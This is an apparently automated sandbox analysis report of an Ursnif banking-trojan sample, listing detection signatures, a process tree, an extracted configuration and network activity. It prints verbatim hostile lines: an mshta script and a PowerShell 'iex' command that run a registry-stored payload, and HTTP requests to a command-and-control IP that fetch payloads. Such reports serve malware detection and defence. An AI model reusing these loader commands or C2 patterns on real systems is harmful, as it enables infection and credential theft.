Loading ...

Play interactive tourEdit tour

Analysis Report https___purefile24.top_4352wedfoifom.php

Overview

General Information

Sample Name:https___purefile24.top_4352wedfoifom.php (renamed file extension from php to dll)
Analysis ID:322850
MD5:e221c9a4b1ac13310d037cbc764b86d9
SHA1:a7dbb7283b3b164993c1c122189e42509fe5573d
SHA256:6b1e27915fa85d6bde40c512865e57c555e7bb02f1dc192a9b827c74c8984780
Tags:php

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Contains VNC / remote desktop functionality (version string found)
Creates a COM Internet Explorer object
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Found Tor onion address
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
PE file contains strange resources
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious Rundll32 Activity
Stores large binary data to the registry
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 6536 cmdline: loaddll32.exe 'C:\Users\user\Desktop\https___purefile24.top_4352wedfoifom.dll' MD5: 76E2251D0E9772B9DA90208AD741A205)
    • control.exe (PID: 6752 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
      • rundll32.exe (PID: 5528 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
    • WerFault.exe (PID: 6576 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6536 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • iexplore.exe (PID: 6740 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6768 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6740 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 7160 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5636 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7160 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 5544 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7160 CREDAT:17420 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 4664 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7160 CREDAT:82960 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 6308 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6476 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 2480 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6932 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4E97.tmp' 'c:\Users\user\AppData\Local\Temp\5ycfw01g\CSC315BF7D299C343BDBB661915DC5BF6A.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 6924 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6956 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES5D9B.tmp' 'c:\Users\user\AppData\Local\Temp\xxfxarla\CSC41D1ABDD5ED14B1EB51F15F27222E36E.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 612 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\7849.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "12", "whoami": "user@computer", "os": "10.0_0_17134_x64", "ip": "84.17.52.25", "dns": "610930", "version": "250166", "uptime": "406", "crc": "59998e77", "id": "7657", "user": "4229768108f8d2d8cdc8873a875bc46d", "soft": "1"}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
https___purefile24.top_4352wedfoifom.dllJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.683789524.0000000003178000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000020.00000003.843504876.000001A778130000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000000.00000003.683743665.0000000003178000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          0000001E.00000003.852406498.0000000003190000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            00000027.00000002.914135566.000001B4FAD45000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
              Click to see the 21 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.loaddll32.exe.10000000.4.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security

                Sigma Overview

                System Summary:

                barindex
                Sigma detected: Dot net compiler compiles file from suspicious locationShow sources
                Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6476, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.cmdline', ProcessId: 2480
                Sigma detected: MSHTA Spawning Windows ShellShow sources
                Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6308, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), ProcessId: 6476
                Sigma detected: Suspicious Csc.exe Source File FolderShow sources
                Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6476, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.cmdline', ProcessId: 2480
                Sigma detected: Suspicious Rundll32 ActivityShow sources
                Source: Process startedAuthor: juju4: Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 6752, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 5528

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Found malware configurationShow sources
                Source: explorer.exe.3424.30.memstrMalware Configuration Extractor: Ursnif {"server": "12", "whoami": "user@computer", "os": "10.0_0_17134_x64", "ip": "84.17.52.25", "dns": "610930", "version": "250166", "uptime": "406", "crc": "59998e77", "id": "7657", "user": "4229768108f8d2d8cdc8873a875bc46d", "soft": "1"}
                Multi AV Scanner detection for submitted fileShow sources
                Source: https___purefile24.top_4352wedfoifom.dllReversingLabs: Detection: 14%
                Source: 0.2.loaddll32.exe.1110000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                Source: 0.2.loaddll32.exe.1100000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_026742B4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,

                Networking:

                barindex
                Creates a COM Internet Explorer objectShow sources
                Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
                Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
                Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
                Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
                Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
                Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
                Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
                Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
                Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
                Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
                Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
                Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
                Found Tor onion addressShow sources
                Source: loaddll32.exe, 00000000.00000002.886882994.00000000009B0000.00000040.00000001.sdmpString found in binary or memory: wADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
                Source: loaddll32.exe, 00000000.00000003.835757240.00000000009E0000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
                Source: powershell.exe, 00000018.00000003.826681690.000001D7C46A0000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
                Source: explorer.exe, 0000001E.00000003.852406498.0000000003190000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
                Source: control.exe, 00000020.00000003.843504876.000001A778130000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
                Source: RuntimeBroker.exe, 00000021.00000002.914614455.0000027D4F835000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
                Source: rundll32.exe, 00000023.00000002.857674347.00000284AA705000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.212.47.223
                Source: global trafficHTTP traffic detected: GET /images/FwuLC5vwQHEiRptaVw08Yg/tQLWbPPJlQjLQ/B_2Byf6b/PU8rgrPZNrdouPsL9pwoxDd/F_2FU7Uq7_/2BsmFnH4ELlf_2BlJ/qvasTVtPc160/_2BGCa7BwG5/XiEDVuUR_2F0Zg/IWoXtyylgdv18ab31_2FU/yx4rgH_2FURRWUyZ/6gUwgFPsNHdjJYY/OP6LVL9vnpF_2FlR6l/FN80SaQZn/t.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: 185.212.47.223Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 185.212.47.223Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /images/MJoyOJW2_2/BMQWUDSfwE2bhMo06/36EifvyMZalx/8gUwjR9k_2F/Dadk4VbWW_2FRN/ITzmt7sSfSh7DfV8J5Sxs/gsPHQP3GI_2BpFcc/vziIw2uQsRSR2n2/peUDHwQ_2F4Kfd6S1d/5UOnL_2Fv/D83izP4rn_2FwQF9Mfeb/peI8RVGRl9HSt3GBrUm/VAt7e_2BvseRDA8bUBljnL/FhJZ.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: 185.212.47.223Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /images/S95XC8m62eUBa7v/ftSV_2FFYJDEUc14i4/Q6iXNtPF_/2BPEiszpcRgIR8yR2Ukd/y5RP0PJdZLTevz9jDLo/EMOcQewMIfz4VuFqodI_2F/M9qdb_2Bkkl9s/3_2FgKSe/HJi5LdFtwmWIaSXCvsyiPML/FIA7MqSfSN/cKd_2BVdiqq56nM6h/Pk9LghTopeqR/aynzZ8A4QuFKH4X/uVs.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: 185.212.47.223Connection: Keep-Alive
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
                Source: unknownDNS traffic detected: queries for: resolver1.opendns.com
